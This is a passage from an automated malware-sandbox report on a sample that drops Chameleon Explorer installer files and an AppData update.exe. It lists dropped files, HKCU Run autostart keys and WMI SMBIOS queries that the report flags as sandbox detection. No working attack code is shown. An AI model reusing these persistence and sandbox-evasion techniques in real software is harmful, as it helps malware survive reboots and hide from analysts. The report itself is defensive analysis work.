                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564F7A8 push ecx; mov dword ptr [esp], edx2_2_0564F7A9
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564FFB8 push ecx; mov dword ptr [esp], ecx2_2_0564FFBC
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05650794 push ecx; mov dword ptr [esp], edx2_2_05650795
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0566061C push 0566067Eh; ret 2_2_05660676
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564FEC4 push ecx; mov dword ptr [esp], edx2_2_0564FEC5
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05689EC8 push ecx; mov dword ptr [esp], edx2_2_05689EC9
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05626EC0 push ecx; mov dword ptr [esp], ecx2_2_05626EC3
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564FED4 push ecx; mov dword ptr [esp], edx2_2_0564FED5
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564EED8 push ecx; mov dword ptr [esp], ecx2_2_0564EEDC
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0568BE90 push ecx; mov dword ptr [esp], ecx2_2_0568BE94
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0568E150 push ecx; mov dword ptr [esp], edx2_2_0568E151
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05689154 push 05689233h; ret 2_2_0568922B
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0561E9D8 push 0561EAC3h; ret 2_2_0561EABB
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_056511DC push ecx; mov dword ptr [esp], edx2_2_056511DD
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564F86C push ecx; mov dword ptr [esp], ecx2_2_0564F870
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0565182C push ecx; mov dword ptr [esp], edx2_2_0565182D
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564C028 push 0564C07Eh; ret 2_2_0564C076
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05652010 push ecx; mov dword ptr [esp], edx2_2_05652011
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05650888 push ecx; mov dword ptr [esp], ecx2_2_0565088C
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05611B48 push 05611B80h; ret 2_2_05611B78
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0565032C push ecx; mov dword ptr [esp], edx2_2_0565032D
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0568DB30 push ecx; mov dword ptr [esp], edx2_2_0568DB31
                      Source: is-7RNBS.tmp.2.drStatic PE information: section name: .didata
                      Source: is-FAU52.tmp.2.drStatic PE information: section name: .didata
                      Source: is-4Q1I9.tmp.2.drStatic PE information: section name: .didata
                      Source: is-5C20L.tmp.2.drStatic PE information: section name: .didata
                      Source: is-HQP5N.tmp.2.drStatic PE information: section name: .didata
                      Source: is-LI6V8.tmp.2.drStatic PE information: section name: .didata
                      Source: is-LI6V8.tmp.2.drStatic PE information: section name: JCLDEBUG
                      Source: is-EV8UG.tmp.2.drStatic PE information: section name: .didata
                      Source: is-EV8UG.tmp.2.drStatic PE information: section name: JCLDEBUG
                      Source: Folder64.dll_backup.15.drStatic PE information: section name: .didata
                      Source: Folder64.dll.15.drStatic PE information: section name: .didata
                      Source: Folder.dll_backup.15.drStatic PE information: section name: .didata
                      Source: Folder.dll.15.drStatic PE information: section name: .didata
                      Source: ExplorerHelper32.dll.16.drStatic PE information: section name: .didata
                      Source: ExplorerHelper32.dll_backup.16.drStatic PE information: section name: .didata
                      Source: ExplorerHelper64.dll.16.drStatic PE information: section name: .didata
                      Source: ExplorerHelper64.dll_backup.16.drStatic PE information: section name: .didata
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.394854300308974
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backupJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backupJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backupJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backupJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backupJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backupJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-FAU52.tmpJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-7RNBS.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-4Q1I9.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile created: C:\Users\user\AppData\Roaming\update.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-89A92.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy)Jump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backupJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeFile created: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dllJump to dropped file
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile created: C:\Users\user\AppData\Local\Temp\autEDA4.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-HQP5N.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V4HOF.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile created: C:\Users\user\AppData\Roaming\cexplorer.exeJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)Jump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backupJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-LI6V8.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-EV8UG.tmpJump to dropped file

                      Boot Survival

                      barindex
                      Creates multiple autostart registry keys
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon FolderJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon ExplorerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon ExplorerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon Explorer\Chameleon Explorer.lnkJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon ExplorerJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon ExplorerJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon FolderJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon FolderJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
